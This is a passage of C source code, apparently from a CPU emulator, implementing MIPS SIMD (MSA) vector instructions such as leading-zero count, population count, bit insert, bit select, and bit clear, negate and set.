pwd->b[2] = msa_nlzc_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_nlzc_df(DF_BYTE, pws->b[3]); pwd->b[4] = msa_nlzc_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_nlzc_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_nlzc_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_nlzc_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_nlzc_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_nlzc_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_nlzc_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_nlzc_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_nlzc_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_nlzc_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_nlzc_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_nlzc_df(DF_BYTE, pws->b[15]); } void helper_msa_nlzc_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_nlzc_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_nlzc_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_nlzc_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_nlzc_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_nlzc_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_nlzc_df(DF_HALF, pws->h[5]); pwd->h[6] = msa_nlzc_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_nlzc_df(DF_HALF, pws->h[7]); } void helper_msa_nlzc_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_nlzc_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_nlzc_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_nlzc_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_nlzc_df(DF_WORD, pws->w[3]); } void helper_msa_nlzc_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_nlzc_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_nlzc_df(DF_DOUBLE, pws->d[1]); } static inline int64_t msa_pcnt_df(uint32_t df, int64_t arg) { uint64_t x; x = UNSIGNED(arg, df); x = (x & 0x5555555555555555ULL) + ((x >> 1) & 0x5555555555555555ULL); x = (x & 0x3333333333333333ULL) + ((x >> 2) & 0x3333333333333333ULL); x = (x & 0x0F0F0F0F0F0F0F0FULL) + ((x >> 4) & 0x0F0F0F0F0F0F0F0FULL); x = (x & 0x00FF00FF00FF00FFULL) + ((x >> 8) & 0x00FF00FF00FF00FFULL); x = (x & 0x0000FFFF0000FFFFULL) + ((x >> 16) & 0x0000FFFF0000FFFFULL); x = (x & 0x00000000FFFFFFFFULL) + ((x >> 32)); return x; } void helper_msa_pcnt_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_pcnt_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_pcnt_df(DF_BYTE, pws->b[1]); pwd->b[2] = msa_pcnt_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_pcnt_df(DF_BYTE, pws->b[3]); pwd->b[4] = msa_pcnt_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_pcnt_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_pcnt_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_pcnt_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_pcnt_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_pcnt_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_pcnt_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_pcnt_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_pcnt_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_pcnt_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_pcnt_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_pcnt_df(DF_BYTE, pws->b[15]); } void helper_msa_pcnt_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_pcnt_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_pcnt_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_pcnt_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_pcnt_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_pcnt_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_pcnt_df(DF_HALF, pws->h[5]); pwd->h[6] = msa_pcnt_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_pcnt_df(DF_HALF, pws->h[7]); } void helper_msa_pcnt_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_pcnt_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_pcnt_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_pcnt_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_pcnt_df(DF_WORD, pws->w[3]); } void helper_msa_pcnt_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_pcnt_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_pcnt_df(DF_DOUBLE, pws->d[1]); } /* * Bit Move * -------- * * +---------------+----------------------------------------------------------+ * | BINSL.B | Vector Bit Insert Left (byte) | * | BINSL.H | Vector Bit Insert Left (halfword) | * | BINSL.W | Vector Bit Insert Left (word) | * | BINSL.D | Vector Bit Insert Left (doubleword) | * | BINSR.B | Vector Bit Insert Right (byte) | * | BINSR.H | Vector Bit Insert Right (halfword) | * | BINSR.W | Vector Bit Insert Right (word) | * | BINSR.D | Vector Bit Insert Right (doubleword) | * | BMNZ.V | Vector Bit Move If Not Zero | * | BMZ.V | Vector Bit Move If Zero | * | BSEL.V | Vector Bit Select | * +---------------+----------------------------------------------------------+ */ /* Data format bit position and unsigned values */ #define BIT_POSITION(x, df) ((uint64_t)(x) % DF_BITS(df)) static inline int64_t msa_binsl_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_dest = UNSIGNED(dest, df); int32_t sh_d = BIT_POSITION(arg2, df) + 1; int32_t sh_a = DF_BITS(df) - sh_d; if (sh_d == DF_BITS(df)) { return u_arg1; } else { return UNSIGNED(UNSIGNED(u_dest << sh_d, df) >> sh_d, df) | UNSIGNED(UNSIGNED(u_arg1 >> sh_a, df) << sh_a, df); } } void helper_msa_binsl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_binsl_df(DF_BYTE, pwd->b[0], pws->b[0], pwt->b[0]); pwd->b[1] = msa_binsl_df(DF_BYTE, pwd->b[1], pws->b[1], pwt->b[1]); pwd->b[2] = msa_binsl_df(DF_BYTE, pwd->b[2], pws->b[2], pwt->b[2]); pwd->b[3] = msa_binsl_df(DF_BYTE, pwd->b[3], pws->b[3], pwt->b[3]); pwd->b[4] = msa_binsl_df(DF_BYTE, pwd->b[4], pws->b[4], pwt->b[4]); pwd->b[5] = msa_binsl_df(DF_BYTE, pwd->b[5], pws->b[5], pwt->b[5]); pwd->b[6] = msa_binsl_df(DF_BYTE, pwd->b[6], pws->b[6], pwt->b[6]); pwd->b[7] = msa_binsl_df(DF_BYTE, pwd->b[7], pws->b[7], pwt->b[7]); pwd->b[8] = msa_binsl_df(DF_BYTE, pwd->b[8], pws->b[8], pwt->b[8]); pwd->b[9] = msa_binsl_df(DF_BYTE, pwd->b[9], pws->b[9], pwt->b[9]); pwd->b[10] = msa_binsl_df(DF_BYTE, pwd->b[10], pws->b[10], pwt->b[10]); pwd->b[11] = msa_binsl_df(DF_BYTE, pwd->b[11], pws->b[11], pwt->b[11]); pwd->b[12] = msa_binsl_df(DF_BYTE, pwd->b[12], pws->b[12], pwt->b[12]); pwd->b[13] = msa_binsl_df(DF_BYTE, pwd->b[13], pws->b[13], pwt->b[13]); pwd->b[14] = msa_binsl_df(DF_BYTE, pwd->b[14], pws->b[14], pwt->b[14]); pwd->b[15] = msa_binsl_df(DF_BYTE, pwd->b[15], pws->b[15], pwt->b[15]); } void helper_msa_binsl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_binsl_df(DF_HALF, pwd->h[0], pws->h[0], pwt->h[0]); pwd->h[1] = msa_binsl_df(DF_HALF, pwd->h[1], pws->h[1], pwt->h[1]); pwd->h[2] = msa_binsl_df(DF_HALF, pwd->h[2], pws->h[2], pwt->h[2]); pwd->h[3] = msa_binsl_df(DF_HALF, pwd->h[3], pws->h[3], pwt->h[3]); pwd->h[4] = msa_binsl_df(DF_HALF, pwd->h[4], pws->h[4], pwt->h[4]); pwd->h[5] = msa_binsl_df(DF_HALF, pwd->h[5], pws->h[5], pwt->h[5]); pwd->h[6] = msa_binsl_df(DF_HALF, pwd->h[6], pws->h[6], pwt->h[6]); pwd->h[7] = msa_binsl_df(DF_HALF, pwd->h[7], pws->h[7], pwt->h[7]); } void helper_msa_binsl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_binsl_df(DF_WORD, pwd->w[0], pws->w[0], pwt->w[0]); pwd->w[1] = msa_binsl_df(DF_WORD, pwd->w[1], pws->w[1], pwt->w[1]); pwd->w[2] = msa_binsl_df(DF_WORD, pwd->w[2], pws->w[2], pwt->w[2]); pwd->w[3] = msa_binsl_df(DF_WORD, pwd->w[3], pws->w[3], pwt->w[3]); } void helper_msa_binsl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_binsl_df(DF_DOUBLE, pwd->d[0], pws->d[0], pwt->d[0]); pwd->d[1] = msa_binsl_df(DF_DOUBLE, pwd->d[1], pws->d[1], pwt->d[1]); } static inline int64_t msa_binsr_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_dest = UNSIGNED(dest, df); int32_t sh_d = BIT_POSITION(arg2, df) + 1; int32_t sh_a = DF_BITS(df) - sh_d; if (sh_d == DF_BITS(df)) { return u_arg1; } else { return UNSIGNED(UNSIGNED(u_dest >> sh_d, df) << sh_d, df) | UNSIGNED(UNSIGNED(u_arg1 << sh_a, df) >> sh_a, df); } } void helper_msa_binsr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_binsr_df(DF_BYTE, pwd->b[0], pws->b[0], pwt->b[0]); pwd->b[1] = msa_binsr_df(DF_BYTE, pwd->b[1], pws->b[1], pwt->b[1]); pwd->b[2] = msa_binsr_df(DF_BYTE, pwd->b[2], pws->b[2], pwt->b[2]); pwd->b[3] = msa_binsr_df(DF_BYTE, pwd->b[3], pws->b[3], pwt->b[3]); pwd->b[4] = msa_binsr_df(DF_BYTE, pwd->b[4], pws->b[4], pwt->b[4]); pwd->b[5] = msa_binsr_df(DF_BYTE, pwd->b[5], pws->b[5], pwt->b[5]); pwd->b[6] = msa_binsr_df(DF_BYTE, pwd->b[6], pws->b[6], pwt->b[6]); pwd->b[7] = msa_binsr_df(DF_BYTE, pwd->b[7], pws->b[7], pwt->b[7]); pwd->b[8] = msa_binsr_df(DF_BYTE, pwd->b[8], pws->b[8], pwt->b[8]); pwd->b[9] = msa_binsr_df(DF_BYTE, pwd->b[9], pws->b[9], pwt->b[9]); pwd->b[10] = msa_binsr_df(DF_BYTE, pwd->b[10], pws->b[10], pwt->b[10]); pwd->b[11] = msa_binsr_df(DF_BYTE, pwd->b[11], pws->b[11], pwt->b[11]); pwd->b[12] = msa_binsr_df(DF_BYTE, pwd->b[12], pws->b[12], pwt->b[12]); pwd->b[13] = msa_binsr_df(DF_BYTE, pwd->b[13], pws->b[13], pwt->b[13]); pwd->b[14] = msa_binsr_df(DF_BYTE, pwd->b[14], pws->b[14], pwt->b[14]); pwd->b[15] = msa_binsr_df(DF_BYTE, pwd->b[15], pws->b[15], pwt->b[15]); } void helper_msa_binsr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_binsr_df(DF_HALF, pwd->h[0], pws->h[0], pwt->h[0]); pwd->h[1] = msa_binsr_df(DF_HALF, pwd->h[1], pws->h[1], pwt->h[1]); pwd->h[2] = msa_binsr_df(DF_HALF, pwd->h[2], pws->h[2], pwt->h[2]); pwd->h[3] = msa_binsr_df(DF_HALF, pwd->h[3], pws->h[3], pwt->h[3]); pwd->h[4] = msa_binsr_df(DF_HALF, pwd->h[4], pws->h[4], pwt->h[4]); pwd->h[5] = msa_binsr_df(DF_HALF, pwd->h[5], pws->h[5], pwt->h[5]); pwd->h[6] = msa_binsr_df(DF_HALF, pwd->h[6], pws->h[6], pwt->h[6]); pwd->h[7] = msa_binsr_df(DF_HALF, pwd->h[7], pws->h[7], pwt->h[7]); } void helper_msa_binsr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_binsr_df(DF_WORD, pwd->w[0], pws->w[0], pwt->w[0]); pwd->w[1] = msa_binsr_df(DF_WORD, pwd->w[1], pws->w[1], pwt->w[1]); pwd->w[2] = msa_binsr_df(DF_WORD, pwd->w[2], pws->w[2], pwt->w[2]); pwd->w[3] = msa_binsr_df(DF_WORD, pwd->w[3], pws->w[3], pwt->w[3]); } void helper_msa_binsr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_binsr_df(DF_DOUBLE, pwd->d[0], pws->d[0], pwt->d[0]); pwd->d[1] = msa_binsr_df(DF_DOUBLE, pwd->d[1], pws->d[1], pwt->d[1]); } void helper_msa_bmnz_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ ((pwd->d[0] & (~pwt->d[0])) | (pws->d[0] & pwt->d[0])), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ ((pwd->d[1] & (~pwt->d[1])) | (pws->d[1] & pwt->d[1])), DF_DOUBLE); } void helper_msa_bmz_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ ((pwd->d[0] & pwt->d[0]) | (pws->d[0] & (~pwt->d[0]))), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ ((pwd->d[1] & pwt->d[1]) | (pws->d[1] & (~pwt->d[1]))), DF_DOUBLE); } void helper_msa_bsel_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ (pws->d[0] & (~pwd->d[0])) | (pwt->d[0] & pwd->d[0]), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ (pws->d[1] & (~pwd->d[1])) | (pwt->d[1] & pwd->d[1]), DF_DOUBLE); } /* * Bit Set * ------- * * +---------------+----------------------------------------------------------+ * | BCLR.B | Vector Bit Clear (byte) | * | BCLR.H | Vector Bit Clear (halfword) | * | BCLR.W | Vector Bit Clear (word) | * | BCLR.D | Vector Bit Clear (doubleword) | * | BNEG.B | Vector Bit Negate (byte) | * | BNEG.H | Vector Bit Negate (halfword) | * | BNEG.W | Vector Bit Negate (word) | * | BNEG.D | Vector Bit Negate (doubleword) | * | BSET.B | Vector Bit Set (byte) | * | BSET.H | Vector Bit Set (halfword) | * | BSET.W | Vector Bit Set (word) | * | BSET.D | Vector Bit Set (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_bclr_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 & (~(1LL << b_arg2)), df); } void helper_msa_bclr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bclr_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bclr_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_bclr_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bclr_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bclr_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bclr_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bclr_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bclr_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bclr_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bclr_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bclr_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bclr_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bclr_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bclr_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bclr_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bclr_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_bclr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bclr_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bclr_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bclr_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bclr_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bclr_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bclr_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bclr_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bclr_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bclr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bclr_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bclr_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bclr_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bclr_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bclr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bclr_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bclr_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_bneg_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 ^ (1LL << b_arg2), df); } void helper_msa_bneg_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bneg_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bneg_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_bneg_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bneg_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bneg_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bneg_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bneg_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bneg_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bneg_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bneg_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bneg_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bneg_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bneg_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bneg_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bneg_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bneg_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_bneg_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bneg_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bneg_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bneg_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bneg_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bneg_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bneg_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bneg_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bneg_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bneg_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bneg_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bneg_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bneg_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bneg_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bneg_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bneg_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bneg_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_bset_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 | (1LL << b_arg2), df); } void helper_msa_bset_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bset_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bset_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_bset_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bset_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bset_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bset_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bset_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bset_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bset_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bset_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bset_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bset_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bset_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bset_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bset_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bset_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_bset_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_bset_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_bset_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_bset_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_bset_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_bset_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_bset_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_bset_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_bset_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_bset_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_bset_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_bset_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_bset_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_bset_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_bset_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_bset_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_bset_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Fixed Multiply * -------------- * * +---------------+----------------------------------------------------------+ * | MADD_Q.H | Vector Fixed-Point Multiply and Add (halfword) | * | MADD_Q.W | Vector Fixed-Point Multiply and Add (word) | * | MADDR_Q.H | Vector Fixed-Point Multiply and Add Rounded (halfword) | * | MADDR_Q.W | Vector Fixed-Point Multiply and Add Rounded (word) | * | MSUB_Q.H | Vector Fixed-Point 